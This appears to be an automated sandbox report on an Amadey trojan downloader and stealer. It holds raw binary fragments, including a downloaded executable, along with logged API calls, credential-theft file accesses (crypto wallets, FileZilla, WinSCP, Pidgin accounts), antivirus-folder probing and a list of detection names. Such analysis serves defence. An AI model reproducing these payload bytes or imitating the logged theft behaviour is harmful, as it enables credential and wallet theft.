,„HƒÄ(éŸé ÌÌÌHƒì(A¸HwlH ¿ès H l„HƒÄ(éoé ÌÌÌHƒì(A¸ HWlH пèC H ¬„HƒÄ(é?é ÌÌÌHƒì(A¸LH?lH  ºè H ì„HƒÄ(éé ÌÌÌHƒì(A¸H_lH 0¶èã H ,…HƒÄ(éßè ÌÌÌHƒì(A¸dHOlH Ãè³ H l…HƒÄ(é¯è ÌÌÌHƒì(A¸H‡lH ð¿èƒ H ¬…HƒÄ(éè ÌÌÌHƒì(A¸HolH ½èS H ì…HƒÄ(éOè ÌÌÌHƒì(A¸ H_lH °µè# H ,†HƒÄ(éè ÌÌÌHƒì(A¸ H?lH ¾èó H l†HƒÄ(éïç ÌÌÌHƒì(A¸(HlH ¼èà H ¬†HƒÄ(é¿ç ÌÌÌHƒì(A¸ HlH `Àè“ H ì†HƒÄ(éç ÌÌÌHƒì(A¸ HÿkH Ãèc H ,‡HƒÄ(é_ç ÌÌÌHƒì(A¸HßkH €½è3 H l‡HƒÄ(é/ç ÌÌÌHƒì(A¸H¿kH 0Àè H ¬‡HƒÄ(éÿæ ÌÌÌHƒì(A¸ H¯kH ¹èÓ H ì‡HƒÄ(éÏæ ÌÌÌHƒì(A¸,HkH Pºè£ H ,ˆHƒÄ(éŸæ ÌÌÌHƒì(A¸HkH à¸ès H lˆHƒÄ(éoæ ÌÌÌHƒì(A¸ HkH ð½èC H ¬ˆHƒÄ(é?æ ÌÌÌHƒì(A¸$H_kH `¿è H ìˆHƒÄ(éæ ÌÌÌHƒì(A¸HWkH Pºèã H ,‰HƒÄ(éßå ÌÌÌHƒì(A¸H?kH @²è³ H l‰HƒÄ(é¯å ÌÌÌHƒì(A¸HkH ðºèƒ H ¬‰HƒÄ(éå ÌÌÌHƒì(A¸HÿjH À¶èS H ì‰HƒÄ(éOå ÌÌÌHƒì(A¸HçjH ¼è# H ,ŠHƒÄ(éå ÌÌÌHƒì(E3ÀH¢ÈH C¸èö H oŠHƒÄ(éòä ÌÌÌÌÌÌHƒì(A¸ HŸjH ð³èà H ¬ŠHƒÄ(é¿ä ÌÌÌHƒì(A¸HjH @·è“ H ìŠHƒÄ(éä ÌÌÌHƒì(A¸HgjH ð²èc H ,‹HƒÄ(é_ä ÌÌÌHƒì(A¸ HGjH à½è3 H l‹HƒÄ(é/ä ÌÌÌHƒì(A¸LH/gH зè H ¬‹HƒÄ(éÿã ÌÌÌHƒì(A¸H×iH à·èÓ H ì‹HƒÄ(éÏã ÌÌÌHƒì(A¸dH?gH ð¸è£ H ,ŒHƒÄ(éŸã ÌÌÌHƒì(A¸H—iH à½ès H lŒHƒÄ(éoã ÌÌÌHƒì(A¸HiH P¼èC H ¬ŒHƒÄ(é?ã ÌÌÌHƒì(A¸ HgiH À·è H ìŒHƒÄ(éã ÌÌÌHƒì(A¸HGiH °³èã H ,HƒÄ(éßâ ÌÌÌHƒì(A¸HiH ¾è³ H lHƒÄ(é¯â ÌÌÌHƒì(A¸H÷hH °¶èƒ H ¬HƒÄ(éâ ÌÌÌHƒì(A¸HÏhH €´èS H ìHƒÄ(éOâ ÌÌÌHƒì(A¸H¯hH ð±è# H ,ŽHƒÄ(éâ ÌÌÌHƒì(A¸HhH `®èó H lŽHƒÄ(éïá ÌÌÌHƒì(A¸ HhH ·èà H ¬ŽHƒÄ(é¿á ÌÌÌHƒì(A¸0H_hH `¼è“ H ìŽHƒÄ(éá ÌÌÌHƒì(A¸ HghH P¼èc H ,HƒÄ(é_á ÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³c—jàc—jàc—jà8ÿiái—jà8ÿoáë—jà8ÿnáq—jà¶únál—jà¶úiár—jà¶úoáB—jà8ÿkád—jàc—kà—jàøùcá`—jàøùjáb—jàøù•àb—jàøùháb—jàRichc—jàPELŸÁfà! R´ rp@@pÜœ ÝPø t@Ë8xË@pL.text–QR `.rdata„tpvV@@.dataìðÌ@À.rsrcøà@@.reloct â@Bj hˆ¾¹`øè/Oh8è\YÃÌÌÌj h¬¾¹xøèOh`8è}\YÃÌÌÌjhо¹øèïNhÀ8è]\YÃÌÌÌj hؾ¹¨øèÏNh 9è=\YÃÌÌÌjhü¾¹Àøè¯Nh€9è\YÃÌÌÌjh¿¹ØøèNhà9èý[YÃÌÌÌjh-¿¹ðøèoNh@:èÝ[YÃÌÌÌjh-¿¹ùèONh :è½[YÃÌÌÌjh-¿¹ ùè/Nh;è[YÃÌÌÌjh-¿¹8ùèNh`;è}[YÃÌÌÌjh0¿¹PùèïMhÀ;è][YÃÌÌÌjh<¿¹hùèÏMh <è=[YÃÌÌÌjhH¿¹€ùè¯Mh€<è[YÃÌÌÌjhT¿¹˜ùèMhà<èýZYÃÌÌÌj$h`¿¹°ùèoMh@=èÝZYÃÌÌÌjhˆ¿¹ÈùèOMh =è½ZYÃÌÌÌjhœ¿¹àùè/Mh>èZYÃÌÌÌj h¼¿¹øùèMh`>è}ZYÃÌÌÌjhÌ¿¹úèïLhÀ>è]ZYÃÌÌÌjhØ¿¹(úèÏLh ?è=ZYÃÌÌÌjh쿹@úè¯Lh€?èZYÃÌÌÌj hø¿¹XúèLhà?èýYYÃÌÌÌjLhÀ¹púèoLh@@èÝYYÃÌÌÌjhXÀ¹ˆúèOLh @è½YYÃÌÌÌjdhxÀ¹ úè/LhAèYYÃÌÌÌjhàÀ¹¸úèLh`Aè}YYÃÌÌÌjhôÀ¹ÐúèïKhÀAè]YYÃÌÌÌj hÁ¹èúèÏKh Bè=YYÃÌÌÌj h Á¹ûè¯Kh€BèYYÃÌÌÌj(h0Á¹ûèKhàBèýXYÃÌÌÌj h\Á¹0ûèoKh@CèÝXYÃÌÌÌj hlÁ¹HûèOKh Cè½XYÃÌÌÌjh|Á¹`ûè/KhDèXYÃÌÌÌjhˆÁ¹xûèKh`Dè}XYÃÌÌÌj h¤Á¹ûèïJhÀDè]XYÃÌÌÌj,h´Á¹¨ûèÏJh Eè=XYÃÌÌÌjhäÁ¹Àûè¯Jh€EèXYÃÌÌÌj h¹ØûèJhàEèýWYÃÌÌÌj$h¹ðûèoJh@FèÝWYÃÌÌÌjh8¹üèOJh Fè½WYÃÌÌÌjhL¹ üè/JhGèWYÃÌÌÌjhX¹8üèJh`Gè}WYÃÌÌÌjhd¹PüèïIhÀGè]WYÃÌÌÌjhx¹hüèÏIh Hè=WYÃÌÌÌjh-¿¹€üè¯Ih€HèWYÃÌÌÌj hÂ¹˜üèIhàHèýVYÃÌÌÌjh Â¹°üèoIh@IèÝVYÃÌÌÌjh¸Â¹ÈüèOIh Iè½VYÃÌÌÌj hĹàüè/IhJèVYÃÌÌÌjLhÀ¹øüèIh`Jè}VYÃÌÌÌjh¸Â¹ýèïHhÀJè]VYÃÌÌÌjdhxÀ¹(ýèÏHh Kè=VYÃÌÌÌjhÔ¹@ýè¯Hh€KèVYÃÌÌÌjhè¹XýèHhàKèýUYÃÌÌÌj hü¹pýèoHh@LèÝUYÃÌÌÌjh ùˆýèOHh Lè½UYÃÌÌÌjhù ýè/HhMèUYÃÌÌÌjhù¸ýèHh`Mè}UYÃÌÌÌjh$ùÐýèïGhÀMè]UYÃÌÌÌjh0ùèýèÏGh Nè=UYÃÌÌÌjh<ùþè¯Gh€NèUYÃÌÌÌj h\ùþèGhàNèýTYÃÌÌÌj0hlù0þèoGh@OèÝTYÃÌÌÌj h Ã¹HþèOGh Oè½TYÃÌÌÌjh°Ã¹`þè/GhPèTYÃÌÌÌjh¼Ã¹xþèGh`Pè}TYÃÌÌÌj<hÈùþèïFhÀPè]TYÃÌÌÌj0hŨþèÏFh Qè=TYÃÌÌÌjh<ĹÀþè¯Fh€QèTYÃÌÌÌj4hHĹØþèFhàQèýSYÃÌÌÌj8h€Ä¹ðþèoFh@RèÝSYÃÌÌÌjh¼Ä¹ÿèOFh Rè½SYÃÌÌÌj<hÈĹ ÿè/FhSèSYÃÌÌÌj4hŹ8ÿèFh`Sè}SYÃÌÌÌj h@ŹPÿèïEhÀSè]SYÃÌÌÌj@hPŹhÿèÏEh Tè=SYÃÌÌÌj8h”Ź€ÿè¯Eh€TèSYÃÌÌÌj hÐŹ˜ÿèEhàTèýRYÃÌÌÌj4hàŹ°ÿèoEh@UèÝRYÃÌÌÌj,hƹÈÿèOEh Uè½RYÃÌÌÌj hHƹàÿè/EhVèRYÃÌÌÌj4hXƹøÿèEh`Vè}RYÃÌÌÌj(hÆ¹èïDhÀVè]RYÃÌÌÌj h¼Æ¹(èÏDh Wè=RYÃÌÌÌj4hÌƹ@è¯Dh€WèRYÃÌÌÌj(hǹXèDhàWèýQYÃÌÌÌjh0ǹpèoDh@XèÝQYÃÌÌÌj<h<ǹˆèODh Xè½QYÃÌÌÌj0h|ǹ è/DhYèQYÃÌÌÌjh°Ç¹¸èDh`Yè}QYÃÌÌÌj<h¼Ç¹ÐèïChÀYè]QYÃÌÌÌj4hüǹèèÏCh Zè=QYÃÌÌÌjh4ȹè¯Ch€ZèQYÃÌÌÌj0h@ȹèChàZèýPYÃÌÌÌj(htȹ0èoCh@[èÝPYÃÌÌÌjh È¹HèOCh [è½PYÃÌÌÌ
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline netsh wlan show profiles
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file C:\Windows\Tasks\Hkbsse.job
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\Litecoin\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Windows\.purple\accounts.xml
file C:\util\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final\.purple\accounts.xml
file C:\Windows\System32\.purple\accounts.xml
file C:\Program Files\Windows Photo Viewer\.purple\accounts.xml
file C:\.purple\accounts.xml
file C:\SystemRoot\System32\.purple\accounts.xml
file C:\Program Files\_Sandboxie\.purple\accounts.xml
file C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file C:\Program Files\Windows NT\Accessories\.purple\accounts.xml
file C:\util\.purple\accounts.xml
file C:\Python27\.purple\accounts.xml
file C:\Program Files (x86)\Microsoft Office\Office12\.purple\accounts.xml
file C:\Users\test22\Downloads\.purple\accounts.xml
file C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file C:\Program Files (x86)\Hnc\Hwp80\.purple\accounts.xml
file C:\Program Files\_Wireshark\.purple\accounts.xml
file C:\Windows\SysWOW64\.purple\accounts.xml
file C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\063c9e1716\.purple\accounts.xml
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W32.AIDetectMalware
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win32.Downloader.gh
ALYac Gen:Variant.Zusy.552096
Cylance Unsafe
VIPRE Gen:Variant.Zusy.552096
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 005790d31 )
BitDefender Gen:Variant.Zusy.552096
K7GW Trojan-Downloader ( 005790d31 )
Arcabit Trojan.Zusy.D86CA0
Baidu Win32.Trojan.Delf.in
Symantec ML.Attribute.HighConfidence
Elastic Windows.Generic.Threat
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Avast Win32:BotX-gen [Trj]
ClamAV Win.Malware.Generic-10033391-0
Kaspersky HEUR:Trojan-Spy.Win32.Stealer.gen
Alibaba TrojanSpy:Win32/Amadey.ec5c772a
MicroWorld-eScan Gen:Variant.Zusy.552096
Rising Stealer.Agent!8.C2 (TFE:5:94ZIjYSVylS)
Emsisoft Gen:Variant.Zusy.552096 (B)
F-Secure Heuristic.HEUR/AGEN.1375090
DrWeb Trojan.MulDrop28.19665
McAfeeD Real Protect-LS!E4F3ED3DAF21
Trapmine malicious.moderate.ml.score
CTX exe.unknown.zusy
Sophos Generic ML PUA (PUA)
SentinelOne Static AI - Suspicious PE
FireEye Generic.mg.e4f3ed3daf213639
Jiangmin TrojanSpy.Stealer.akal
Google Detected
Avira HEUR/AGEN.1375090
Kingsoft malware.kb.a.979
Microsoft Trojan:Win32/Amadey!MTB
ZoneAlarm HEUR:Trojan-Spy.Win32.Stealer.gen
GData Gen:Variant.Zusy.552096
Varist W32/Stealer.HF.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.R664066
DeepInstinct MALICIOUS
VBA32 BScope.TrojanDownloader.Deyma
Malwarebytes Trojan.Amadey
Ikarus Trojan-Downloader.Win32.Amadey
Panda Trj/GdSda.A
Tencent Malware.Win32.Gencirc.11c63a0f
huorong TrojanDownloader/Amadey.p
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Amadey.A!tr.dldr
AVG Win32:BotX-gen [Trj]